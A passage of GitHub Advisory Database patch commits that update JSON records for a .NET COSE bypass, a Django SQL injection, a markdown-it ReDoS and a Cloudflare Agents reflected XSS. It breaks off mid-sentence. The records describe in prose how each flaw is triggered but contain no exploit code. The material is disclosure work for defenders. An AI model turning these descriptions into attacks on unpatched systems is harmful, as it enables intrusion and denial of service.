.../02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json b/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json index bbc291a2be5e0..eaff76ee3608b 100644 --- a/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json +++ b/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json @@ -1,18 +1,14 @@ { "schema_version": "1.4.0", "id": "GHSA-qvhc-9v3j-5rfw", - "modified": "2026-02-12T17:44:46Z", + "modified": "2026-02-13T19:43:22Z", "published": "2026-02-10T21:32:18Z", "aliases": [ "CVE-2026-21218" ], "summary": "Microsoft Security Advisory CVE-2026-21218 | .NET Security Feature Bypass Vulnerability", - "details": "# Microsoft Security Advisory CVE-2026-21218 | .NET Security Feature Bypass Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 8.0, .NET 9.0, and .NET 10.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nAn attacker could exploit this vulnerability by crafting a malicious payload that bypasses the security checks in the affected System.Security.Cryptography.Cose versions, potentially leading to unauthorized access or data manipulation.\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/380\n\n## Mitigation factors\n\nIf your application does not use System.Security.Cryptography.Cose it is not affected. By default, no .NET applications reference this component.\n\n## Affected Packages\nThe vulnerability affects any Microsoft .NET project if it uses any of affected packages versions listed below\n\n### .NET 10\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 10.0.0, < 10.0.2 | 10.0.3\n\n### .NET 9\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 9.0.0, < 9.0.12 | 9.0.13\n\n### .NET 8\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 8.0.0, < 8.0.1 | 8.0.2\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf an affected package listed in [affected software](#affected-software) or [affected packages](#affected-packages), you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\nTo update the Using the System.Security.Cryptography.Cose NuGet package, use one of the following methods:\n\nNuGet Package Manager UI in Visual Studio:\n- Open your project in Visual Studio.\n- Right-click on your project in Solution Explorer and select \"Manage NuGet Packages...\" or navigate to \"Project > Manage NuGet Packages\".\n- In the NuGet Package Manager window, select the \"Updates\" tab. This tab lists packages with available updates from your configured package sources.\n- Select the package(s) you wish to update. You can choose a specific version from the dropdown or update to the latest available version.\n- Click the \"Update\" button.\n\nUsing the NuGet Package Manager Console in Visual Studio:\n- Open your project in Visual Studio.\n- Navigate to \"Tools > NuGet Package Manager > Package Manager Console\".\n- To update a specific package to its latest version, use the following Update-Package command:\n\n```\nUpdate-Package -Id System.Security.Cryptography.Cose\n```\n\nUsing the .NET CLI (Command Line Interface):\n- Open a terminal or command prompt in your project's directory.\n- To update a specific package to its latest version, use the following add package command:\n\n```\ndotnet add package System.Security.Cryptography.Cose\n```\n\nOnce you have updated the nuget package reference you must recompile and deploy your application. Additionally we recommend you update your runtime and/or SDKs, but it is not necessary to patch the vulnerability.\n\n## Other Information\n\n### Reporting Security Issues\n\nIf you have found a potential security issue in a supported version of .NET, please report it to the Microsoft Security Response Center (MSRC) via the [MSRC Researcher Portal](https://msrc.microsoft.com/report/vulnerability/new). Further information can be found in the MSRC [Report an Issue FAQ](https://www.microsoft.com/msrc/faqs-report-an-issue).\n\nSecurity reports made through MSRC may qualify for the Microsoft .NET Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at https://aka.ms/corebounty.\n\n### Support\n\nYou can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.\n\n### Disclaimer\n\nThe information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\n\n### External Links\n\n[CVE-2026-21218](https://www.cve.org/CVERecord?id=CVE-2026-21218)\n\n### Acknowledgements\n\nvcsjones with GitHub\n\n### Revisions\n\nV1.0 (February 10, 2026): Advisory published.", + "details": "# Microsoft Security Advisory CVE-2026-21218 | .NET Security Feature Bypass Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 8.0, .NET 9.0, and .NET 10.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nAn attacker could exploit this vulnerability by crafting a malicious payload that bypasses the security checks in the affected System.Security.Cryptography.Cose versions, potentially leading to unauthorized access or data manipulation.\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/380\n\n## Mitigation factors\n\nIf your application does not use System.Security.Cryptography.Cose it is not affected. By default, no .NET applications reference this component.\n\n## Affected Packages\nThe vulnerability affects any Microsoft .NET project if it uses any of affected packages versions listed below\n\n### .NET 10\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 10.0.0, <= 10.0.2 | 10.0.3\n\n### .NET 9\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 9.0.0, <= 9.0.12 | 9.0.13\n\n### .NET 8\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 8.0.0, <= 8.0.1 | 8.0.2\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf an affected package listed in [affected software](#affected-software) or [affected packages](#affected-packages), you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\nTo update the Using the System.Security.Cryptography.Cose NuGet package, use one of the following methods:\n\nNuGet Package Manager UI in Visual Studio:\n- Open your project in Visual Studio.\n- Right-click on your project in Solution Explorer and select \"Manage NuGet Packages...\" or navigate to \"Project > Manage NuGet Packages\".\n- In the NuGet Package Manager window, select the \"Updates\" tab. This tab lists packages with available updates from your configured package sources.\n- Select the package(s) you wish to update. You can choose a specific version from the dropdown or update to the latest available version.\n- Click the \"Update\" button.\n\nUsing the NuGet Package Manager Console in Visual Studio:\n- Open your project in Visual Studio.\n- Navigate to \"Tools > NuGet Package Manager > Package Manager Console\".\n- To update a specific package to its latest version, use the following Update-Package command:\n\n```\nUpdate-Package -Id System.Security.Cryptography.Cose\n```\n\nUsing the .NET CLI (Command Line Interface):\n- Open a terminal or command prompt in your project's directory.\n- To update a specific package to its latest version, use the following add package command:\n\n```\ndotnet add package System.Security.Cryptography.Cose\n```\n\nOnce you have updated the nuget package reference you must recompile and deploy your application. Additionally we recommend you update your runtime and/or SDKs, but it is not necessary to patch the vulnerability.\n\n## Other Information\n\n### Reporting Security Issues\n\nIf you have found a potential security issue in a supported version of .NET, please report it to the Microsoft Security Response Center (MSRC) via the [MSRC Researcher Portal](https://msrc.microsoft.com/report/vulnerability/new). Further information can be found in the MSRC [Report an Issue FAQ](https://www.microsoft.com/msrc/faqs-report-an-issue).\n\nSecurity reports made through MSRC may qualify for the Microsoft .NET Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at https://aka.ms/corebounty.\n\n### Support\n\nYou can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.\n\n### Disclaimer\n\nThe information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\n\n### External Links\n\n[CVE-2026-21218](https://www.cve.org/CVERecord?id=CVE-2026-21218)\n\n### Acknowledgements\n\nvcsjones with GitHub\n\n### Revisions\n\nV1.0 (February 10, 2026): Advisory published.", "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" - }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" @@ -60,7 +56,7 @@ } ], "database_specific": { - "last_known_affected_version_range": "< 9.0.12" + "last_known_affected_version_range": "<= 9.0.12" } }, { @@ -82,7 +78,7 @@ } ], "database_specific": { - "last_known_affected_version_range": "< 10.0.2" + "last_known_affected_version_range": "<= 10.0.2" } } ], From b0da1d5857c7eaaccab279ecc444471f0098ad3b Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 19:57:35 +0000 Subject: [PATCH 12/36] Publish GHSA-6426-9fv3-65x8 --- .../2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json b/advisories/github-reviewed/2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json index a760766599ba5..4ca15dfff45b2 100644 --- a/advisories/github-reviewed/2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json +++ b/advisories/github-reviewed/2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6426-9fv3-65x8", - "modified": "2026-02-03T19:35:57Z", + "modified": "2026-02-13T19:55:25Z", "published": "2026-02-03T15:30:24Z", "aliases": [ "CVE-2026-1312" @@ -10,8 +10,8 @@ "details": "An issue was discovered in 6.0 before 6.0.2, 5.2 before 5.2.11, and 4.2 before 4.2.28.\n\n`.QuerySet.order_by()` is subject to SQL injection in column aliases containing periods when the same alias is, using a suitably crafted dictionary, with dictionary expansion, used in `FilteredRelation`. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected.\n\nDjango would like to thank Solomon Kebede for reporting this issue.", "severity": [ { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U" + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" } ], "affected": [ @@ -107,7 +107,7 @@ "cwe_ids": [ "CWE-89" ], - "severity": "HIGH", + "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-03T19:35:56Z", "nvd_published_at": "2026-02-03T15:16:13Z" From acfcbcdafb291203572a85474681a243af8bfe36 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 20:06:46 +0000 Subject: [PATCH 13/36] Publish Advisories GHSA-38c4-r59v-3vqw GHSA-cvhv-6xm6-c3v4 GHSA-g433-pq76-6cmf GHSA-cvhv-6xm6-c3v4 --- .../GHSA-38c4-r59v-3vqw.json | 37 ++++++- .../GHSA-cvhv-6xm6-c3v4.json | 65 +++++++++++ .../GHSA-g433-pq76-6cmf.json | 103 ++++++++++++++++++ .../GHSA-cvhv-6xm6-c3v4.json | 34 ------ 4 files changed, 199 insertions(+), 40 deletions(-) rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json (67%) create mode 100644 advisories/github-reviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-g433-pq76-6cmf/GHSA-g433-pq76-6cmf.json delete mode 100644 advisories/unreviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json diff --git a/advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json b/advisories/github-reviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json similarity index 67% rename from advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json rename to advisories/github-reviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json index 89a716520ae70..8d068ccd0ebf8 100644 --- a/advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json +++ b/advisories/github-reviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-38c4-r59v-3vqw", - "modified": "2026-02-12T06:30:13Z", + "modified": "2026-02-13T20:04:39Z", "published": "2026-02-12T06:30:13Z", "aliases": [ "CVE-2026-2327" ], + "summary": "markdown-it is has a Regular Expression Denial of Service (ReDoS)", "details": "Versions of the package markdown-it from 13.0.0 and before 14.1.1 are vulnerable to Regular Expression Denial of Service (ReDoS) due to the use of the regex /\\*+$/ in the linkify function. An attacker can supply a long sequence of * characters followed by a non-matching character, which triggers excessive backtracking and may lead to a denial-of-service condition.", "severity": [ { @@ -14,10 +15,30 @@ }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "markdown-it" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "13.0.0" + }, + { + "fixed": "14.1.1" + } + ] + } + ] } ], - "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +52,13 @@ "type": "WEB", "url": "https://gist.github.com/ltduc147/c9abecae1b291ede4f692f2ab988c917" }, + { + "type": "PACKAGE", + "url": "https://github.com/markdown-it/markdown-it" + }, { "type": "WEB", - "url": "https://github.com/markdown-it/markdown-it/blob/14.1.0/lib/rules_inline/linkify.mjs%23L33" + "url": "https://github.com/markdown-it/markdown-it/blob/14.1.0/lib/rules_inline/linkify.mjs#L33" }, { "type": "WEB", @@ -45,8 +70,8 @@ "CWE-1333" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2026-02-13T20:04:39Z", "nvd_published_at": "2026-02-12T06:16:02Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json b/advisories/github-reviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json new file mode 100644 index 0000000000000..3cc25c3b3a55b --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cvhv-6xm6-c3v4", + "modified": "2026-02-13T20:04:56Z", + "published": "2026-02-13T03:31:23Z", + "aliases": [ + "CVE-2026-1721" + ], + "summary": "Cloudflare Agents is Vulnerable to Reflected Cross-Site Scripting in the AI Playground's OAuth callback handler", + "details": "Summary\n\nA Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the AI Playground's OAuth callback handler. The `error_description` query parameter was directly interpolated into an HTML script tag without proper escaping, allowing attackers to execute arbitrary JavaScript in the context of the victim's session.\n\nRoot cause\n\nThe OAuth callback handler in `site/ai-playground/src/server.ts` directly interpolated the `authError` value, sourced from the `error_description` query parameter, into an inline `